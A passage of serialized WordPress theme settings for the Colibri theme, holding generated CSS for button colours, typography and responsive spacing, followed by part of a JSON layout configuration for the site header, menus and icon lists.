45z\"/></svg>\";}s:3:\"css\";s:16346:\"\n.h-y-container > *:not(:last-child), .h-x-container-inner > * {\n margin-bottom: 20px;\n}\n.h-x-container-inner, .h-column__content > .h-x-container > *:last-child {\n margin-bottom: -20px;\n}\n.h-x-container-inner > * {\n padding-left: 10px;\n padding-right: 10px;\n}\n.h-x-container-inner {\n margin-left: -10px;\n margin-right: -10px;\n}\n[class*=style-], [class*=local-style-], .h-global-transition, .h-global-transition-all, .h-global-transition-all * {\n transition-duration: 0.5s;\n}\n.wp-block-button .wp-block-button__link:not(.has-background),.wp-block-file .wp-block-file__button {\n background-color: #03a9f4;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link:not(.has-background):hover,.wp-block-button .wp-block-button__link:not(.has-background):focus,.wp-block-button .wp-block-button__link:not(.has-background):active,.wp-block-file .wp-block-file__button:hover,.wp-block-file .wp-block-file__button:focus,.wp-block-file .wp-block-file__button:active {\n background-color: rgb(2, 110, 159);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background) {\n color: #03a9f4;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #03a9f4;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #03a9f4;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #03a9f4;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #03a9f4;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background):hover,.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background):focus,.wp-block-button.is-style-outline .wp-block-button__link:not(.has-background):active {\n color: #fff;\n background-color: #03a9f4;\n background-image: none;\n}\n.has-background-color,*[class^=\"wp-block-\"].is-style-solid-color {\n background-color: #03a9f4;\n background-image: none;\n}\n.has-colibri-color-1-background-color {\n background-color: #03a9f4;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color {\n background-color: #03a9f4;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-1-background-color:active {\n background-color: rgb(2, 110, 159);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color {\n color: #03a9f4;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #03a9f4;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #03a9f4;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #03a9f4;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #03a9f4;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-1-background-color:active {\n color: #fff;\n background-color: #03a9f4;\n background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-1-background-color,*[class^=\"wp-block-\"] .has-colibri-color-1-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-1-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-1-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-1-color p {\n background-color: #03a9f4;\n background-image: none;\n}\n.has-colibri-color-1-color {\n color: #03a9f4;\n}\n.has-colibri-color-2-background-color {\n background-color: #f79007;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color {\n background-color: #f79007;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-2-background-color:active {\n background-color: rgb(162, 94, 5);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color {\n color: #f79007;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #f79007;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #f79007;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #f79007;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #f79007;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-2-background-color:active {\n color: #fff;\n background-color: #f79007;\n background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-2-background-color,*[class^=\"wp-block-\"] .has-colibri-color-2-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-2-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-2-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-2-color p {\n background-color: #f79007;\n background-image: none;\n}\n.has-colibri-color-2-color {\n color: #f79007;\n}\n.has-colibri-color-3-background-color {\n background-color: #00bf87;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color {\n background-color: #00bf87;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-3-background-color:active {\n background-color: rgb(0, 106, 75);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color {\n color: #00bf87;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #00bf87;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #00bf87;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #00bf87;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #00bf87;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-3-background-color:active {\n color: #fff;\n background-color: #00bf87;\n background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-3-background-color,*[class^=\"wp-block-\"] .has-colibri-color-3-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-3-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-3-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-3-color p {\n background-color: #00bf87;\n background-image: none;\n}\n.has-colibri-color-3-color {\n color: #00bf87;\n}\n.has-colibri-color-4-background-color {\n background-color: #6632ff;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color {\n background-color: #6632ff;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-4-background-color:active {\n background-color: rgb(68, 33, 170);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color {\n color: #6632ff;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #6632ff;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #6632ff;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #6632ff;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #6632ff;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-4-background-color:active {\n color: #fff;\n background-color: #6632ff;\n background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-4-background-color,*[class^=\"wp-block-\"] .has-colibri-color-4-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-4-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-4-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-4-color p {\n background-color: #6632ff;\n background-image: none;\n}\n.has-colibri-color-4-color {\n color: #6632ff;\n}\n.has-colibri-color-5-background-color {\n background-color: #FFFFFF;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color {\n background-color: #FFFFFF;\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-5-background-color:active {\n background-color: rgb(102, 102, 102);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color {\n color: #FFFFFF;\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: #FFFFFF;\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: #FFFFFF;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #FFFFFF;\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: #FFFFFF;\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-5-background-color:active {\n color: #fff;\n background-color: #FFFFFF;\n background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-5-background-color,*[class^=\"wp-block-\"] .has-colibri-color-5-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-5-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-5-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-5-color p {\n background-color: #FFFFFF;\n background-image: none;\n}\n.has-colibri-color-5-color {\n color: #FFFFFF;\n}\n.has-colibri-color-6-background-color {\n background-color: rgb(0, 0, 0);\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color {\n background-color: rgb(0, 0, 0);\n background-image: none;\n}\n.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color:hover,.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color:focus,.wp-block-button .wp-block-button__link.has-colibri-color-6-background-color:active {\n background-color: rgb(51, 51, 51);\n background-image: none;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color {\n color: rgb(0, 0, 0);\n background-color: transparent;\n background-image: none;\n border-top-width: 2px;\n border-top-color: rgb(0, 0, 0);\n border-top-style: solid;\n border-right-width: 2px;\n border-right-color: rgb(0, 0, 0);\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: rgb(0, 0, 0);\n border-bottom-style: solid;\n border-left-width: 2px;\n border-left-color: rgb(0, 0, 0);\n border-left-style: solid;\n}\n.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color:hover,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color:focus,.wp-block-button.is-style-outline .wp-block-button__link.has-colibri-color-6-background-color:active {\n color: #fff;\n background-color: rgb(0, 0, 0);\n background-image: none;\n}\n*[class^=\"wp-block-\"].has-colibri-color-6-background-color,*[class^=\"wp-block-\"] .has-colibri-color-6-background-color,*[class^=\"wp-block-\"].is-style-solid-color.has-colibri-color-6-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-6-color,*[class^=\"wp-block-\"].is-style-solid-color blockquote.has-colibri-color-6-color p {\n background-color: rgb(0, 0, 0);\n background-image: none;\n}\n.has-colibri-color-6-color {\n color: rgb(0, 0, 0);\n}\n.h-section-global-spacing {\n padding-top: 90px;\n padding-bottom: 90px;\n}\nbody {\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n line-height: 1.6;\n color: rgb(153, 153, 153);\n}\nbody a {\n font-family: Open Sans;\n font-weight: 400;\n text-decoration: none;\n font-size: 1em;\n line-height: 1.5;\n color: #03a9f4;\n}\nbody a:hover {\n color: rgb(2, 110, 159);\n}\nbody p {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n line-height: 1.6;\n color: rgb(153, 153, 153);\n}\nbody .h-lead p {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 300;\n font-size: 1.25em;\n line-height: 1.5;\n color: rgb(102, 102, 102);\n}\nbody blockquote p {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n line-height: 1.6;\n color: rgb(153, 153, 153);\n}\nbody h1 {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 300;\n font-size: 3.375em;\n line-height: 1.26;\n color: rgb(51, 51, 51);\n}\nbody h2 {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 300;\n font-size: 2.625em;\n line-height: 1.143;\n color: rgb(51, 51, 51);\n}\nbody h3 {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 300;\n font-size: 2.25em;\n line-height: 1.25;\n color: rgb(51, 51, 51);\n}\nbody h4 {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 600;\n font-size: 1.25em;\n line-height: 1.6;\n color: rgb(51, 51, 51);\n}\nbody h5 {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 600;\n font-size: 1.125em;\n line-height: 1.55;\n color: rgb(51, 51, 51);\n}\nbody h6 {\n margin-bottom: 16px;\n font-family: Open Sans;\n font-weight: 600;\n font-size: 1em;\n line-height: 1.6;\n color: rgb(51, 51, 51);\n}\n .content.colibri-main-content-single .main-section,.content.colibri-main-content-archive .main-section {\n padding-top: 90px;\n padding-bottom: 90px;\n}\n .content.colibri-main-content-single .main-section .colibri-sidebar.blog-sidebar-right,.content.colibri-main-content-archive .main-section .colibri-sidebar.blog-sidebar-right {\n width: 25% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n max-width: 25%;\n}\n\n\n@media (min-width: 768px) and (max-width: 1023px){\n.h-section-global-spacing {\n padding-top: 60px;\n padding-bottom: 60px;\n}\n .content.colibri-main-content-single .main-section .colibri-sidebar.blog-sidebar-right,.content.colibri-main-content-archive .main-section .colibri-sidebar.blog-sidebar-right {\n width: 33.33% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n max-width: 33.33%;\n}\n\n}\n\n@media (max-width: 767px){\n.h-section-global-spacing {\n padding-top: 30px;\n padding-bottom: 30px;\n}\n .content.colibri-main-content-single .main-section .colibri-sidebar.blog-sidebar-right,.content.colibri-main-content-archive .main-section .colibri-sidebar.blog-sidebar-right {\n width: 100% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n max-width: 100%;\n}\n\n}\n\";s:5:\"rules\";s:88996:\"[{\"id\":1,\"type\":\"hop-header\",\"v\":\"1.1\",\"nodes\":[\"7-h1\"]},{\"id\":2,\"style\":{\"ancestor\":{\"sticky\":{\"background\":{\"color\":\"#ffffff\"},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"10\"},\"bottom\":{\"path\":\"value\",\"value\":\"10\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"0\",\"blur\":\"4\"}]}}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"bottom\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"background\":{\"color\":\"transparent\"}},\"type\":\"hop-navigation\",\"props\":{\"overlap\":true,\"sticky\":true,\"stickyStartAt\":\"immediately\",\"showTopBar\":false,\"width\":\"boxed\",\"layoutType\":\"logo-spacing-menu\"},\"v\":\"1.1\",\"nodes\":[\"7-h2\"]},{\"id\":3,\"props\":{\"containerWidth\":\"boxed\",\"layout\":{\"equalWidth\":false,\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h3\",\"10-h3\"]},{\"id\":4,\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h4\"]},{\"id\":5,\"type\":\"hop-logo\",\"props\":{\"horizontalTextAlign\":\"left\",\"media\":{\"mobile\":{\"horizontalTextAlign\":\"left\"}},\"layoutType\":\"text\"},\"v\":\"1.1\",\"nodes\":[\"7-h5\"],\"style\":{\"descendants\":{\"logo-text\":{\"typography\":{\"color\":\"${theme.colors.4}\"}},\"text\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"24\"}}}}}},{\"id\":6,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"nodeId\":\"7-h66\",\"v\":\"1.1\",\"nodes\":[\"7-h6\"]},{\"id\":7,\"type\":\"hop-spacer\",\"nodeId\":\"7-h78\",\"v\":\"1.1\",\"nodes\":[\"7-h7\",\"10-h7\"]},{\"id\":8,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"textAlign\":\"center\",\"media\":{\"mobile\":{\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h8\"]},{\"id\":9,\"type\":\"hop-horizontal-menu\",\"style\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"props\":{\"hoverEffect\":{\"type\":\"bordered-active-item bordered-active-item--bottom\",\"activeGroup\":\"border\",\"group\":{\"border\":{\"transition\":\"effect-borders-grow grow-from-center\"}},\"enabled\":true},\"sticky\":true,\"showOffscreenMenuOn\":\"has-offcanvas-tablet\"},\"v\":\"1.1\",\"nodes\":[\"7-h9\"]},{\"id\":10,\"type\":\"hop-mobile-menu\",\"nodeId\":\"11-h33\",\"v\":\"1.1\",\"nodes\":[\"7-h10\",\"10-h10\"]},{\"id\":11,\"type\":\"hop-offscreen-panel\",\"nodeId\":\"11-h34\",\"v\":\"1.1\",\"nodes\":[\"7-h11\",\"10-h11\"]},{\"id\":12,\"type\":\"hop-row\",\"nodeId\":\"11-h36\",\"v\":\"1.1\",\"nodes\":[\"7-h13\",\"10-h13\"]},{\"id\":13,\"type\":\"hop-column\",\"nodeId\":\"11-h37\",\"v\":\"1.1\",\"nodes\":[\"7-h14\",\"10-h14\"]},{\"id\":14,\"type\":\"hop-logo\",\"nodeId\":\"11-h38\",\"v\":\"1.1\",\"nodes\":[\"7-h15\",\"10-h15\"],\"props\":{\"layoutType\":\"text\"}},{\"id\":15,\"type\":\"hop-row\",\"nodeId\":\"11-h39\",\"v\":\"1.1\",\"nodes\":[\"7-h16\",\"10-h16\"]},{\"id\":16,\"type\":\"hop-column\",\"nodeId\":\"11-h40\",\"v\":\"1.1\",\"nodes\":[\"7-h17\",\"10-h17\"]},{\"id\":17,\"style\":{\"descendants\":{\"link\":{\"typography\":{\"color\":\"white\"}},\"submenu-item-link\":{\"typography\":{\"color\":\"white\"}},\"iconOption\":{\"typography\":{\"color\":\"white\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"white\"}}}},\"props\":{\"layout\":\"accordion\"},\"type\":\"hop-accordion-menu\",\"nodeId\":\"11-h35\",\"v\":\"1.1\",\"nodes\":[\"7-h12\",\"10-h12\"]},{\"id\":18,\"type\":\"hop-top-bar\",\"props\":{\"width\":\"boxed\"},\"v\":\"1.1\",\"nodes\":[\"7-h19\",\"10-h19\"]},{\"id\":19,\"style\":{\"background\":{\"color\":\"black\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\",\"value\":\"15\"}}},\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"fullBackground\":true,\"hide\":{\"mobile\":true}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h20\",\"10-h20\"]},{\"id\":20,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"7-h21\",\"10-h21\"]},{\"id\":21,\"type\":\"hop-icon-list\",\"style\":{\"descendants\":{\"li\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"divider\":{\"border\":{\"left\":{\"width\":{\"value\":1,\"unit\":\"px\"}},\"bottom\":{\"width\":{\"value\":0,\"unit\":\"px\"}}},\"height\":{\"value\":100,\"unit\":\"%\"}},\"containerDivider\":{\"height\":{\"value\":100,\"unit\":\"%\"},\"width\":{\"value\":1,\"unit\":\"px\"},\"padding\":{\"left\":{\"value\":10,\"unit\":\"px\"},\"top\":{\"value\":0,\"unit\":\"px\"},\"right\":{\"value\":10,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"18\"},\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"}}},\"height\":{\"path\":\"value\",\"value\":\"18\"},\"border\":{\"top\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\",\"path\":\"value\"}}},\"text\":{\"margin\":{\"left\":{\"path\":\"value\",\"value\":\"5\"}},\"color\":\"${theme.colors.4}\",\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"list-item\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}},\"horizontalAlign\":\"start\"}}},\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #1\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.15907223444395013},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #2\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.34341111083051734},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #3\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.0941660601972718},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #4\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.5295691579821964}],\"iconAndTextAlign\":\"center\",\"listLayout\":\"horizontal\"},\"v\":\"1.1\",\"nodes\":[\"7-h22\",\"10-h22\"]},{\"id\":22,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h23\",\"10-h23\"]},{\"id\":23,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"0\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}}}},\"props\":{\"horizontalAlign\":\"end\",\"media\":{\"mobile\":{\"horizontalAlign\":\"center\"}},\"hide\":{\"mobile\":false}},\"v\":\"1.1\",\"nodes\":[\"7-h24\",\"10-h24\"]},{\"id\":24,\"style\":{\"typography\":{\"holders\":{\"h1\":{\"color\":\"${theme.colors.4}\"},\"h2\":{\"color\":\"${theme.colors.4}\"},\"h3\":{\"color\":\"${theme.colors.4}\"},\"h4\":{\"color\":\"${theme.colors.4}\"},\"h5\":{\"color\":\"${theme.colors.4}\"},\"h6\":{\"color\":\"${theme.colors.4}\"},\"p\":{\"color\":\"${theme.colors.4}\"}}},\"background\":{\"type\":\"image\",\"overlay\":{\"enabled\":true,\"type\":\"color\",\"gradient\":{\"angle\":\"-20\",\"steps\":[{\"color\":\"rgba(183,33,255, 0.4)\",\"position\":\"0\"},{\"color\":\"rgba(33,212,253, 